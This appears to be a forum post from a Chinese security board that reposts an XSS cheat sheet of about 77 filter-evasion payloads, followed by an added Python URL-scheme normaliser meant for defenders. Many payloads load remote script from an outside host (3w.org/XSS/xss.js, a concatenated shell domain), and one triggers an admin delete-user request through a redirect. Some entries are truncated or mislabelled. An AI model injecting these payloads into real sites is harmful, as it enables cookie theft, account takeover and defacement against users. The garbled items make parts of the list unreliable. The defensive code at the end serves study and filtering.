It seems t00ls has rather little material on XSS. I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Fixing the defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters basically don't work in China, because there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can embed the JS code in an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
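Added example, not from the original post or the cheat sheet it copies: a Python normaliser for the filter side that undoes the tricks items (4), (5), (8) to (14), (17) and (19) rely on (mixed case, numeric entities with or without semicolons, embedded tab/newline/CR, null bytes, leading spaces) before checking an attribute URL's scheme against an allow-list. The function names and the sample inputs are my own.

```python
import html
import re

# Characters a browser drops from a URL before scheme dispatch (tab, LF, CR),
# plus NUL, which older engines also ignored (cf. the null-byte items above).
_STRIP_ANYWHERE = re.compile(r"[\t\n\r\x00]")
# Leading control characters and spaces are trimmed before the scheme is read.
_LEADING_JUNK = re.compile(r"^[\x00-\x20\xa0]+")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")

# Only these schemes (or no scheme: relative / protocol-relative URLs) pass.
ALLOWED_SCHEMES = frozenset({"", "http", "https"})


def decode_entities(value: str) -> str:
    """Decode character references. html.unescape also accepts the
    semicolon-less numeric forms (&#106 / &#x6A) that lenient HTML parsers
    resolve, so the 'no semicolon' variants in the list are covered."""
    return html.unescape(value)


def normalize_url(value: str) -> str:
    """Reduce an attribute URL to what the browser will actually act on."""
    s = decode_entities(value)
    s = _STRIP_ANYWHERE.sub("", s)
    s = _LEADING_JUNK.sub("", s)
    return s


def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalised URL, '' if it has none."""
    m = _SCHEME.match(normalize_url(value))
    return m.group(1).lower() if m else ""


def is_safe_url(value: str) -> bool:
    """Allow-list check on the scheme: True only for http(s) or relative."""
    return url_scheme(value) in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed samples modelled on the list above (not copied from it).
    samples = [
        "JaVaScRiPt:alert('XSS')",                       # (4) mixed case
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
        "jav&#x09;ascript:alert('XSS')",                 # (12) encoded tab
        "java\x00script:alert('XSS')",                   # (17) null byte
        " javascript:alert('XSS')",                      # (19) leading space
        "http://3w.org/XSS/xss.js",                      # legitimate
    ]
    for s in samples:
        print(is_safe_url(s), repr(url_scheme(s)), repr(s))
```

The check deliberately decides on the decoded scheme rather than on substrings of the raw value, so blacklisting the string "javascript" is not what protects you here.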
Original source: http://fuzzexp.org/u/0day/?p=145